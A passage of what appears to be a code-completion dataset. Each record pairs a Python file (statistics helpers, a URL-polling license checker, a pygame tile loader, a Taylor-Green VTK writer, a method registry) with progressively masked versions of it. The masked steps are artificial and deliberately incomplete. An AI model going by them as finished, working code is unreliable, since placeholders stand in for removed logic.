"step-5": "import numpy as np\nfrom math import ceil, log2\n\n\ndef avg(list):\n return np.mean(list)\n\n\ndef dispersion(list):\n res = 0\n for i in list:\n res += (i - np.mean(list)) ** 2\n return res / len(list)\n\n\ndef variation_coefficient(list):\n return (dispersion(list) ** (1/2) / np.mean(list)) * 100\n\n\ndef chi_square(list):\n b = sorted(list)\n k = ceil(log2(len(list)) + 1)\n step = 10000 / k\n p = 1 / k\n\n frequency_vector = []\n\n for i in range(k):\n counter = 0\n for j in b:\n if (j > i * step) and (j <= (i + 1) * step):\n counter += 1\n else:\n continue\n frequency_vector.append(counter)\n chi = 0\n for i in range(k):\n chi += ((frequency_vector[i] - p * len(list)) ** 2) / (p * len(list))\n\n return 0.8 <= chi <= 16.8\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#!/usr/bin/env python
import urllib
class LicenseChecker( object ):
def __init__( self ):
self.url = 'http://logon.guidoaccardo.com.ar/'
self.count_offline = 15
def __countTimes( self ):
ff = open( 'times.ehead', 'r' )
bb = ff.read()
ff.close()
return int( bb )
def __updateTimes( self, times ):
actual = self.__countTimes()
ff = open( 'times.ehead', 'w' )
ff.write( str( actual-times ) )
ff.close()
def isActive( self ):
try:
site = urllib.urlopen( self.url )
content = site.readlines()
site.close()
except IOError:
if not self.__countTimes() == 0:
self.__updateTimes( 1 )
return { 'active':True, 'msg':'Ejecutando sin conexion.' }
else:
return { 'active':False, 'msg':'Ejecutado demasiadas veces sin conexion.' }
if content[0].strip() == 'ACTIVE':
self.__updateTimes( self.count_offline )
return { 'active':True, 'msg':'Iniciando Sistema' }
else:
return { 'active':False, 'msg':content[0].strip() }
|
normal
|
{
"blob_id": "c70aa1a373530ac73553753e62d3989f5bc79287",
"index": 687,
"step-1": "<mask token>\n\n\nclass LicenseChecker(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass LicenseChecker(object):\n <mask token>\n <mask token>\n\n def __updateTimes(self, times):\n actual = self.__countTimes()\n ff = open('times.ehead', 'w')\n ff.write(str(actual - times))\n ff.close()\n\n def isActive(self):\n try:\n site = urllib.urlopen(self.url)\n content = site.readlines()\n site.close()\n except IOError:\n if not self.__countTimes() == 0:\n self.__updateTimes(1)\n return {'active': True, 'msg': 'Ejecutando sin conexion.'}\n else:\n return {'active': False, 'msg':\n 'Ejecutado demasiadas veces sin conexion.'}\n if content[0].strip() == 'ACTIVE':\n self.__updateTimes(self.count_offline)\n return {'active': True, 'msg': 'Iniciando Sistema'}\n else:\n return {'active': False, 'msg': content[0].strip()}\n",
"step-3": "<mask token>\n\n\nclass LicenseChecker(object):\n\n def __init__(self):\n self.url = 'http://logon.guidoaccardo.com.ar/'\n self.count_offline = 15\n\n def __countTimes(self):\n ff = open('times.ehead', 'r')\n bb = ff.read()\n ff.close()\n return int(bb)\n\n def __updateTimes(self, times):\n actual = self.__countTimes()\n ff = open('times.ehead', 'w')\n ff.write(str(actual - times))\n ff.close()\n\n def isActive(self):\n try:\n site = urllib.urlopen(self.url)\n content = site.readlines()\n site.close()\n except IOError:\n if not self.__countTimes() == 0:\n self.__updateTimes(1)\n return {'active': True, 'msg': 'Ejecutando sin conexion.'}\n else:\n return {'active': False, 'msg':\n 'Ejecutado demasiadas veces sin conexion.'}\n if content[0].strip() == 'ACTIVE':\n self.__updateTimes(self.count_offline)\n return {'active': True, 'msg': 'Iniciando Sistema'}\n else:\n return {'active': False, 'msg': content[0].strip()}\n",
"step-4": "import urllib\n\n\nclass LicenseChecker(object):\n\n def __init__(self):\n self.url = 'http://logon.guidoaccardo.com.ar/'\n self.count_offline = 15\n\n def __countTimes(self):\n ff = open('times.ehead', 'r')\n bb = ff.read()\n ff.close()\n return int(bb)\n\n def __updateTimes(self, times):\n actual = self.__countTimes()\n ff = open('times.ehead', 'w')\n ff.write(str(actual - times))\n ff.close()\n\n def isActive(self):\n try:\n site = urllib.urlopen(self.url)\n content = site.readlines()\n site.close()\n except IOError:\n if not self.__countTimes() == 0:\n self.__updateTimes(1)\n return {'active': True, 'msg': 'Ejecutando sin conexion.'}\n else:\n return {'active': False, 'msg':\n 'Ejecutado demasiadas veces sin conexion.'}\n if content[0].strip() == 'ACTIVE':\n self.__updateTimes(self.count_offline)\n return {'active': True, 'msg': 'Iniciando Sistema'}\n else:\n return {'active': False, 'msg': content[0].strip()}\n",
"step-5": "#!/usr/bin/env python\n\nimport urllib\n\nclass LicenseChecker( object ):\n\n def __init__( self ):\n self.url = 'http://logon.guidoaccardo.com.ar/'\n self.count_offline = 15\n\n def __countTimes( self ):\n ff = open( 'times.ehead', 'r' )\n bb = ff.read()\n ff.close()\n\n return int( bb )\n\n def __updateTimes( self, times ):\n actual = self.__countTimes()\n ff = open( 'times.ehead', 'w' )\n ff.write( str( actual-times ) )\n ff.close()\n\n def isActive( self ):\n try:\n site = urllib.urlopen( self.url )\n content = site.readlines()\n site.close()\n except IOError:\n if not self.__countTimes() == 0:\n self.__updateTimes( 1 )\n return { 'active':True, 'msg':'Ejecutando sin conexion.' }\n else:\n return { 'active':False, 'msg':'Ejecutado demasiadas veces sin conexion.' }\n\n if content[0].strip() == 'ACTIVE':\n self.__updateTimes( self.count_offline )\n return { 'active':True, 'msg':'Iniciando Sistema' }\n else:\n return { 'active':False, 'msg':content[0].strip() }\n",
"step-ids": [
1,
3,
5,
6,
7
]
}
|
[
1,
3,
5,
6,
7
] |
__author__ = 'Administrator'
import unittest
class CouchTests2(unittest.TestCase):
def test_foo(self):
self.assertEqual(1, 1)
def test_bar(self):
self.assertEqual(1, 1)
|
normal
|
{
"blob_id": "cd4f22b8e2188e8019e7324e80d64a7b95f8f956",
"index": 1961,
"step-1": "<mask token>\n\n\nclass CouchTests2(unittest.TestCase):\n <mask token>\n\n def test_bar(self):\n self.assertEqual(1, 1)\n",
"step-2": "<mask token>\n\n\nclass CouchTests2(unittest.TestCase):\n\n def test_foo(self):\n self.assertEqual(1, 1)\n\n def test_bar(self):\n self.assertEqual(1, 1)\n",
"step-3": "__author__ = 'Administrator'\n<mask token>\n\n\nclass CouchTests2(unittest.TestCase):\n\n def test_foo(self):\n self.assertEqual(1, 1)\n\n def test_bar(self):\n self.assertEqual(1, 1)\n",
"step-4": "__author__ = 'Administrator'\nimport unittest\n\n\nclass CouchTests2(unittest.TestCase):\n\n def test_foo(self):\n self.assertEqual(1, 1)\n\n def test_bar(self):\n self.assertEqual(1, 1)\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
import pygame
pygame.init()
class Tiles:
Size = 32
Blocked = []
Blocked_Types = ["5", "6", "7", "9", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "20", "25", "27", "28", "29"]
def Blocked_At(pos):
if list(pos) in Tiles.Blocked:
return True
else:
return False
def Load_Texture(file, Size):
bitmap = pygame.image.load(file)
bitmap = pygame.transform.scale(bitmap, (Size, Size))
surface = pygame.Surface((Size, Size), pygame.HWSURFACE|pygame.SRCALPHA)
surface.blit(bitmap, (0, 0))
return surface
Tiles = Load_Texture("Graphics\\hospitalTile.png", Size)
Stone = Load_Texture("Graphics\\stone.png", Size)
Grass = Load_Texture("Graphics\\grass.png", Size)
Water = Load_Texture("Graphics\\water.png", Size)
Machine = Load_Texture("Graphics\\hospitalTileMachine.png", Size*4)
WifeY = Load_Texture("Graphics\\young_bed.png", Size*4)
WifeO = Load_Texture("Graphics\\old_bed.png", Size*4)
DoorOpen = Load_Texture("Graphics\\door_open.png", Size)
DoorClosed = Load_Texture("Graphics\\door_closed.png", Size)
WallLeft = Load_Texture("Graphics\\leftwall.png", Size)
WallUpper = Load_Texture("Graphics\\upperwall.png", Size)
WallRight = Load_Texture("Graphics\\rightwall.png", Size)
WallLower = Load_Texture("Graphics\\lowerwall.png", Size)
UpperLeftCorner = Load_Texture("Graphics\\left_upperCorner.png", Size)
UpperRightCorner = Load_Texture("Graphics\\right_upperCorner.png", Size)
LowerRightCorner = Load_Texture("Graphics\\right_lowerCorner.png", Size)
LowerLeftCorner = Load_Texture("Graphics\\left_lowerCorner.png", Size)
TowerWall = Load_Texture("Graphics\\Towerwall.png", Size)
TowerWallLeft = Load_Texture("Graphics\\TowerwallLeft.png", Size)
TowerWallRight = Load_Texture("Graphics\\TowerwallRight.png", Size)
WoodFloor = Load_Texture("Graphics\\woodfloor.png", Size)
Balloons = Load_Texture("Graphics\\balloons.png", Size)
Yellow = Load_Texture("Graphics\\yellow.png", Size)
White = Load_Texture("Graphics\\white.png", Size)
Tombstone = Load_Texture("Graphics\\tombstone.png", Size)
Sand = Load_Texture("Graphics\\sand.png", Size)
Plane = Load_Texture("Graphics\\plane.png", Size * 8)
Car1 = Load_Texture("Graphics\\car3.png", Size * 6)
Car2 = Load_Texture("Graphics\\car4.png", Size * 6)
Texture_Tags = {"1" : Grass,
"2" : Stone,
"3" : Water,
"4" : Tiles,
"5" : Machine,
"6" : WifeY,
"7" : WifeO,
"8" : DoorOpen,
"9" : DoorClosed,
"10" : WallLeft,
"11" : WallUpper,
"12" : WallRight,
"13" : WallLower,
"14" : UpperLeftCorner,
"15" : UpperRightCorner,
"16" : LowerRightCorner,
"17" : LowerLeftCorner,
"18" : TowerWall,
"19" : TowerWallLeft,
"20" : TowerWallRight,
"21" : WoodFloor,
"22" : Balloons,
"23" : Yellow,
"24" : White,
"25" : Tombstone,
"26" : Sand,
"27" : Plane,
"28" : Car1,
"29" : Car2}
|
normal
|
{
"blob_id": "3d1f7794763b058cc22c543709a97cb021d0fd23",
"index": 8404,
"step-1": "<mask token>\n\n\nclass Tiles:\n <mask token>\n <mask token>\n <mask token>\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE | pygame.\n SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Tiles:\n Size = 32\n Blocked = []\n Blocked_Types = ['5', '6', '7', '9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '25', '27', '28', '29']\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE | pygame.\n SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n Tiles = Load_Texture('Graphics\\\\hospitalTile.png', Size)\n Stone = Load_Texture('Graphics\\\\stone.png', Size)\n Grass = Load_Texture('Graphics\\\\grass.png', Size)\n Water = Load_Texture('Graphics\\\\water.png', Size)\n Machine = Load_Texture('Graphics\\\\hospitalTileMachine.png', Size * 4)\n WifeY = Load_Texture('Graphics\\\\young_bed.png', Size * 4)\n WifeO = Load_Texture('Graphics\\\\old_bed.png', Size * 4)\n DoorOpen = Load_Texture('Graphics\\\\door_open.png', Size)\n DoorClosed = Load_Texture('Graphics\\\\door_closed.png', Size)\n WallLeft = Load_Texture('Graphics\\\\leftwall.png', Size)\n WallUpper = Load_Texture('Graphics\\\\upperwall.png', Size)\n WallRight = Load_Texture('Graphics\\\\rightwall.png', Size)\n WallLower = Load_Texture('Graphics\\\\lowerwall.png', Size)\n UpperLeftCorner = Load_Texture('Graphics\\\\left_upperCorner.png', Size)\n UpperRightCorner = Load_Texture('Graphics\\\\right_upperCorner.png', Size)\n LowerRightCorner = Load_Texture('Graphics\\\\right_lowerCorner.png', Size)\n LowerLeftCorner = Load_Texture('Graphics\\\\left_lowerCorner.png', Size)\n TowerWall = Load_Texture('Graphics\\\\Towerwall.png', Size)\n TowerWallLeft = Load_Texture('Graphics\\\\TowerwallLeft.png', Size)\n TowerWallRight = Load_Texture('Graphics\\\\TowerwallRight.png', Size)\n WoodFloor = Load_Texture('Graphics\\\\woodfloor.png', Size)\n Balloons = Load_Texture('Graphics\\\\balloons.png', Size)\n Yellow = Load_Texture('Graphics\\\\yellow.png', Size)\n White = Load_Texture('Graphics\\\\white.png', Size)\n Tombstone = Load_Texture('Graphics\\\\tombstone.png', Size)\n Sand = Load_Texture('Graphics\\\\sand.png', Size)\n Plane = Load_Texture('Graphics\\\\plane.png', Size * 8)\n Car1 = Load_Texture('Graphics\\\\car3.png', Size * 6)\n Car2 = Load_Texture('Graphics\\\\car4.png', Size * 6)\n Texture_Tags = {'1': Grass, '2': Stone, '3': Water, '4': Tiles, '5':\n Machine, '6': WifeY, '7': WifeO, '8': DoorOpen, '9': DoorClosed,\n '10': WallLeft, '11': WallUpper, '12': WallRight, '13': WallLower,\n '14': UpperLeftCorner, '15': UpperRightCorner, '16':\n LowerRightCorner, '17': LowerLeftCorner, '18': TowerWall, '19':\n TowerWallLeft, '20': TowerWallRight, '21': WoodFloor, '22':\n Balloons, '23': Yellow, '24': White, '25': Tombstone, '26': Sand,\n '27': Plane, '28': Car1, '29': Car2}\n",
"step-3": "<mask token>\npygame.init()\n\n\nclass Tiles:\n Size = 32\n Blocked = []\n Blocked_Types = ['5', '6', '7', '9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '25', '27', '28', '29']\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE | pygame.\n SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n Tiles = Load_Texture('Graphics\\\\hospitalTile.png', Size)\n Stone = Load_Texture('Graphics\\\\stone.png', Size)\n Grass = Load_Texture('Graphics\\\\grass.png', Size)\n Water = Load_Texture('Graphics\\\\water.png', Size)\n Machine = Load_Texture('Graphics\\\\hospitalTileMachine.png', Size * 4)\n WifeY = Load_Texture('Graphics\\\\young_bed.png', Size * 4)\n WifeO = Load_Texture('Graphics\\\\old_bed.png', Size * 4)\n DoorOpen = Load_Texture('Graphics\\\\door_open.png', Size)\n DoorClosed = Load_Texture('Graphics\\\\door_closed.png', Size)\n WallLeft = Load_Texture('Graphics\\\\leftwall.png', Size)\n WallUpper = Load_Texture('Graphics\\\\upperwall.png', Size)\n WallRight = Load_Texture('Graphics\\\\rightwall.png', Size)\n WallLower = Load_Texture('Graphics\\\\lowerwall.png', Size)\n UpperLeftCorner = Load_Texture('Graphics\\\\left_upperCorner.png', Size)\n UpperRightCorner = Load_Texture('Graphics\\\\right_upperCorner.png', Size)\n LowerRightCorner = Load_Texture('Graphics\\\\right_lowerCorner.png', Size)\n LowerLeftCorner = Load_Texture('Graphics\\\\left_lowerCorner.png', Size)\n TowerWall = Load_Texture('Graphics\\\\Towerwall.png', Size)\n TowerWallLeft = Load_Texture('Graphics\\\\TowerwallLeft.png', Size)\n TowerWallRight = Load_Texture('Graphics\\\\TowerwallRight.png', Size)\n WoodFloor = Load_Texture('Graphics\\\\woodfloor.png', Size)\n Balloons = Load_Texture('Graphics\\\\balloons.png', Size)\n Yellow = Load_Texture('Graphics\\\\yellow.png', Size)\n White = Load_Texture('Graphics\\\\white.png', Size)\n Tombstone = Load_Texture('Graphics\\\\tombstone.png', Size)\n Sand = Load_Texture('Graphics\\\\sand.png', Size)\n Plane = Load_Texture('Graphics\\\\plane.png', Size * 8)\n Car1 = Load_Texture('Graphics\\\\car3.png', Size * 6)\n Car2 = Load_Texture('Graphics\\\\car4.png', Size * 6)\n Texture_Tags = {'1': Grass, '2': Stone, '3': Water, '4': Tiles, '5':\n Machine, '6': WifeY, '7': WifeO, '8': DoorOpen, '9': DoorClosed,\n '10': WallLeft, '11': WallUpper, '12': WallRight, '13': WallLower,\n '14': UpperLeftCorner, '15': UpperRightCorner, '16':\n LowerRightCorner, '17': LowerLeftCorner, '18': TowerWall, '19':\n TowerWallLeft, '20': TowerWallRight, '21': WoodFloor, '22':\n Balloons, '23': Yellow, '24': White, '25': Tombstone, '26': Sand,\n '27': Plane, '28': Car1, '29': Car2}\n",
"step-4": "import pygame\npygame.init()\n\n\nclass Tiles:\n Size = 32\n Blocked = []\n Blocked_Types = ['5', '6', '7', '9', '10', '11', '12', '13', '14', '15',\n '16', '17', '18', '19', '20', '25', '27', '28', '29']\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE | pygame.\n SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n Tiles = Load_Texture('Graphics\\\\hospitalTile.png', Size)\n Stone = Load_Texture('Graphics\\\\stone.png', Size)\n Grass = Load_Texture('Graphics\\\\grass.png', Size)\n Water = Load_Texture('Graphics\\\\water.png', Size)\n Machine = Load_Texture('Graphics\\\\hospitalTileMachine.png', Size * 4)\n WifeY = Load_Texture('Graphics\\\\young_bed.png', Size * 4)\n WifeO = Load_Texture('Graphics\\\\old_bed.png', Size * 4)\n DoorOpen = Load_Texture('Graphics\\\\door_open.png', Size)\n DoorClosed = Load_Texture('Graphics\\\\door_closed.png', Size)\n WallLeft = Load_Texture('Graphics\\\\leftwall.png', Size)\n WallUpper = Load_Texture('Graphics\\\\upperwall.png', Size)\n WallRight = Load_Texture('Graphics\\\\rightwall.png', Size)\n WallLower = Load_Texture('Graphics\\\\lowerwall.png', Size)\n UpperLeftCorner = Load_Texture('Graphics\\\\left_upperCorner.png', Size)\n UpperRightCorner = Load_Texture('Graphics\\\\right_upperCorner.png', Size)\n LowerRightCorner = Load_Texture('Graphics\\\\right_lowerCorner.png', Size)\n LowerLeftCorner = Load_Texture('Graphics\\\\left_lowerCorner.png', Size)\n TowerWall = Load_Texture('Graphics\\\\Towerwall.png', Size)\n TowerWallLeft = Load_Texture('Graphics\\\\TowerwallLeft.png', Size)\n TowerWallRight = Load_Texture('Graphics\\\\TowerwallRight.png', Size)\n WoodFloor = Load_Texture('Graphics\\\\woodfloor.png', Size)\n Balloons = Load_Texture('Graphics\\\\balloons.png', Size)\n Yellow = Load_Texture('Graphics\\\\yellow.png', Size)\n White = Load_Texture('Graphics\\\\white.png', Size)\n Tombstone = Load_Texture('Graphics\\\\tombstone.png', Size)\n Sand = Load_Texture('Graphics\\\\sand.png', Size)\n Plane = Load_Texture('Graphics\\\\plane.png', Size * 8)\n Car1 = Load_Texture('Graphics\\\\car3.png', Size * 6)\n Car2 = Load_Texture('Graphics\\\\car4.png', Size * 6)\n Texture_Tags = {'1': Grass, '2': Stone, '3': Water, '4': Tiles, '5':\n Machine, '6': WifeY, '7': WifeO, '8': DoorOpen, '9': DoorClosed,\n '10': WallLeft, '11': WallUpper, '12': WallRight, '13': WallLower,\n '14': UpperLeftCorner, '15': UpperRightCorner, '16':\n LowerRightCorner, '17': LowerLeftCorner, '18': TowerWall, '19':\n TowerWallLeft, '20': TowerWallRight, '21': WoodFloor, '22':\n Balloons, '23': Yellow, '24': White, '25': Tombstone, '26': Sand,\n '27': Plane, '28': Car1, '29': Car2}\n",
"step-5": "import pygame\n\npygame.init()\n\n\n\nclass Tiles:\n Size = 32\n Blocked = []\n Blocked_Types = [\"5\", \"6\", \"7\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\", \"19\", \"20\", \"25\", \"27\", \"28\", \"29\"]\n\n def Blocked_At(pos):\n if list(pos) in Tiles.Blocked:\n return True\n else:\n return False\n\n\n def Load_Texture(file, Size):\n bitmap = pygame.image.load(file)\n bitmap = pygame.transform.scale(bitmap, (Size, Size))\n surface = pygame.Surface((Size, Size), pygame.HWSURFACE|pygame.SRCALPHA)\n surface.blit(bitmap, (0, 0))\n return surface\n\n\n Tiles = Load_Texture(\"Graphics\\\\hospitalTile.png\", Size)\n Stone = Load_Texture(\"Graphics\\\\stone.png\", Size)\n Grass = Load_Texture(\"Graphics\\\\grass.png\", Size)\n Water = Load_Texture(\"Graphics\\\\water.png\", Size)\n\n Machine = Load_Texture(\"Graphics\\\\hospitalTileMachine.png\", Size*4)\n WifeY = Load_Texture(\"Graphics\\\\young_bed.png\", Size*4)\n WifeO = Load_Texture(\"Graphics\\\\old_bed.png\", Size*4)\n DoorOpen = Load_Texture(\"Graphics\\\\door_open.png\", Size)\n DoorClosed = Load_Texture(\"Graphics\\\\door_closed.png\", Size)\n\n WallLeft = Load_Texture(\"Graphics\\\\leftwall.png\", Size)\n WallUpper = Load_Texture(\"Graphics\\\\upperwall.png\", Size)\n WallRight = Load_Texture(\"Graphics\\\\rightwall.png\", Size)\n WallLower = Load_Texture(\"Graphics\\\\lowerwall.png\", Size)\n UpperLeftCorner = Load_Texture(\"Graphics\\\\left_upperCorner.png\", Size)\n UpperRightCorner = Load_Texture(\"Graphics\\\\right_upperCorner.png\", Size)\n LowerRightCorner = Load_Texture(\"Graphics\\\\right_lowerCorner.png\", Size)\n LowerLeftCorner = Load_Texture(\"Graphics\\\\left_lowerCorner.png\", Size)\n\n TowerWall = Load_Texture(\"Graphics\\\\Towerwall.png\", Size)\n TowerWallLeft = Load_Texture(\"Graphics\\\\TowerwallLeft.png\", Size)\n TowerWallRight = Load_Texture(\"Graphics\\\\TowerwallRight.png\", Size)\n WoodFloor = Load_Texture(\"Graphics\\\\woodfloor.png\", Size)\n\n Balloons = Load_Texture(\"Graphics\\\\balloons.png\", Size)\n Yellow = Load_Texture(\"Graphics\\\\yellow.png\", Size)\n White = Load_Texture(\"Graphics\\\\white.png\", Size)\n Tombstone = Load_Texture(\"Graphics\\\\tombstone.png\", Size)\n Sand = Load_Texture(\"Graphics\\\\sand.png\", Size)\n Plane = Load_Texture(\"Graphics\\\\plane.png\", Size * 8)\n Car1 = Load_Texture(\"Graphics\\\\car3.png\", Size * 6)\n Car2 = Load_Texture(\"Graphics\\\\car4.png\", Size * 6)\n\n Texture_Tags = {\"1\" : Grass,\n \"2\" : Stone,\n \"3\" : Water,\n \"4\" : Tiles,\n \"5\" : Machine,\n \"6\" : WifeY,\n \"7\" : WifeO,\n \"8\" : DoorOpen,\n \"9\" : DoorClosed,\n \"10\" : WallLeft,\n \"11\" : WallUpper,\n \"12\" : WallRight,\n \"13\" : WallLower,\n \"14\" : UpperLeftCorner,\n \"15\" : UpperRightCorner,\n \"16\" : LowerRightCorner,\n \"17\" : LowerLeftCorner,\n \"18\" : TowerWall,\n \"19\" : TowerWallLeft,\n \"20\" : TowerWallRight,\n \"21\" : WoodFloor,\n \"22\" : Balloons,\n \"23\" : Yellow,\n \"24\" : White,\n \"25\" : Tombstone,\n \"26\" : Sand,\n \"27\" : Plane,\n \"28\" : Car1,\n \"29\" : Car2}",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from collections import namedtuple
from math import tau, sin, cos, atan2
grid = 21
c = grid / 2
points = grid**3
Velocity = namedtuple('Velocity', ('x', 'y', 'z'))
velocity = []
for k in range(grid):
for j in range(grid):
for i in range(grid):
x = (i / grid + 0.25) * tau
y = (j / grid + 0.25) * tau
z = (k / grid + 0.25) * tau
u = cos(x) * sin(y) * cos(z)
v = -sin(x) * cos(y) * cos(z)
w = 0.0
velocity.append(Velocity(u, v, w))
with open('taylor-green.vtk', 'w') as f:
f.write(f"""\
# vtk DataFile Version 2.0
test
ASCII
DATASET STRUCTURED_POINTS
DIMENSIONS {grid} {grid} {grid}
ORIGIN 0.0 0.0 0.0
SPACING 1.0 1.0 1.0
POINT_DATA {points}
VECTORS velocity float
""")
for v in velocity:
f.write(f"{v.x} {v.y} {v.z}\n")
f.write("SCALARS angle float\n")
f.write("LOOKUP_TABLE default\n")
for v in velocity:
f.write("%f\n" % atan2(v.y, v.x))
|
normal
|
{
"blob_id": "d70986b016e58877c39bfbb76c5bd622c44cbca9",
"index": 9273,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor k in range(grid):\n for j in range(grid):\n for i in range(grid):\n x = (i / grid + 0.25) * tau\n y = (j / grid + 0.25) * tau\n z = (k / grid + 0.25) * tau\n u = cos(x) * sin(y) * cos(z)\n v = -sin(x) * cos(y) * cos(z)\n w = 0.0\n velocity.append(Velocity(u, v, w))\nwith open('taylor-green.vtk', 'w') as f:\n f.write(\n f\"\"\"# vtk DataFile Version 2.0\ntest\nASCII\nDATASET STRUCTURED_POINTS\nDIMENSIONS {grid} {grid} {grid}\nORIGIN 0.0 0.0 0.0\nSPACING 1.0 1.0 1.0\n\nPOINT_DATA {points}\nVECTORS velocity float\n\"\"\"\n )\n for v in velocity:\n f.write(f'{v.x} {v.y} {v.z}\\n')\n f.write('SCALARS angle float\\n')\n f.write('LOOKUP_TABLE default\\n')\n for v in velocity:\n f.write('%f\\n' % atan2(v.y, v.x))\n",
"step-3": "<mask token>\ngrid = 21\nc = grid / 2\npoints = grid ** 3\nVelocity = namedtuple('Velocity', ('x', 'y', 'z'))\nvelocity = []\nfor k in range(grid):\n for j in range(grid):\n for i in range(grid):\n x = (i / grid + 0.25) * tau\n y = (j / grid + 0.25) * tau\n z = (k / grid + 0.25) * tau\n u = cos(x) * sin(y) * cos(z)\n v = -sin(x) * cos(y) * cos(z)\n w = 0.0\n velocity.append(Velocity(u, v, w))\nwith open('taylor-green.vtk', 'w') as f:\n f.write(\n f\"\"\"# vtk DataFile Version 2.0\ntest\nASCII\nDATASET STRUCTURED_POINTS\nDIMENSIONS {grid} {grid} {grid}\nORIGIN 0.0 0.0 0.0\nSPACING 1.0 1.0 1.0\n\nPOINT_DATA {points}\nVECTORS velocity float\n\"\"\"\n )\n for v in velocity:\n f.write(f'{v.x} {v.y} {v.z}\\n')\n f.write('SCALARS angle float\\n')\n f.write('LOOKUP_TABLE default\\n')\n for v in velocity:\n f.write('%f\\n' % atan2(v.y, v.x))\n",
"step-4": "from collections import namedtuple\nfrom math import tau, sin, cos, atan2\ngrid = 21\nc = grid / 2\npoints = grid ** 3\nVelocity = namedtuple('Velocity', ('x', 'y', 'z'))\nvelocity = []\nfor k in range(grid):\n for j in range(grid):\n for i in range(grid):\n x = (i / grid + 0.25) * tau\n y = (j / grid + 0.25) * tau\n z = (k / grid + 0.25) * tau\n u = cos(x) * sin(y) * cos(z)\n v = -sin(x) * cos(y) * cos(z)\n w = 0.0\n velocity.append(Velocity(u, v, w))\nwith open('taylor-green.vtk', 'w') as f:\n f.write(\n f\"\"\"# vtk DataFile Version 2.0\ntest\nASCII\nDATASET STRUCTURED_POINTS\nDIMENSIONS {grid} {grid} {grid}\nORIGIN 0.0 0.0 0.0\nSPACING 1.0 1.0 1.0\n\nPOINT_DATA {points}\nVECTORS velocity float\n\"\"\"\n )\n for v in velocity:\n f.write(f'{v.x} {v.y} {v.z}\\n')\n f.write('SCALARS angle float\\n')\n f.write('LOOKUP_TABLE default\\n')\n for v in velocity:\n f.write('%f\\n' % atan2(v.y, v.x))\n",
"step-5": "from collections import namedtuple\nfrom math import tau, sin, cos, atan2\n\ngrid = 21\nc = grid / 2\npoints = grid**3\n\nVelocity = namedtuple('Velocity', ('x', 'y', 'z'))\n\nvelocity = []\nfor k in range(grid):\n for j in range(grid):\n for i in range(grid):\n x = (i / grid + 0.25) * tau \n y = (j / grid + 0.25) * tau\n z = (k / grid + 0.25) * tau \n u = cos(x) * sin(y) * cos(z)\n v = -sin(x) * cos(y) * cos(z)\n w = 0.0\n velocity.append(Velocity(u, v, w))\n\nwith open('taylor-green.vtk', 'w') as f:\n f.write(f\"\"\"\\\n# vtk DataFile Version 2.0\ntest\nASCII\nDATASET STRUCTURED_POINTS\nDIMENSIONS {grid} {grid} {grid}\nORIGIN 0.0 0.0 0.0\nSPACING 1.0 1.0 1.0\n\nPOINT_DATA {points}\nVECTORS velocity float\n\"\"\")\n for v in velocity:\n f.write(f\"{v.x} {v.y} {v.z}\\n\")\n\n f.write(\"SCALARS angle float\\n\")\n f.write(\"LOOKUP_TABLE default\\n\")\n \n for v in velocity:\n f.write(\"%f\\n\" % atan2(v.y, v.x))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
_method_adaptors = dict()
def register_dist_adaptor(method_name):
def decorator(func):
_method_adaptors[method_name] = func
def wrapper(*args, **kwargs):
func(*args, **kwargs)
return wrapper
return decorator
def get_nearest_method(method_name, parser):
"""
all candidates toked
all protocol untoked
input:
queries:
[
(protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)
(protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)
(protocol, (candidate, sen_id, start, K), (candidate, sen_id, start, K), ...)
]
output:
[
nearest_idx1,
nearest_idx2,
nearest_idx3,
...
]
"""
return _method_adaptors[method_name](parser)
def get_method_names():
return list(_method_adaptors.keys())
|
normal
|
{
"blob_id": "ed2f3bbc7eb0a4d8f5ccdb7a12e00cbddab04dd0",
"index": 577,
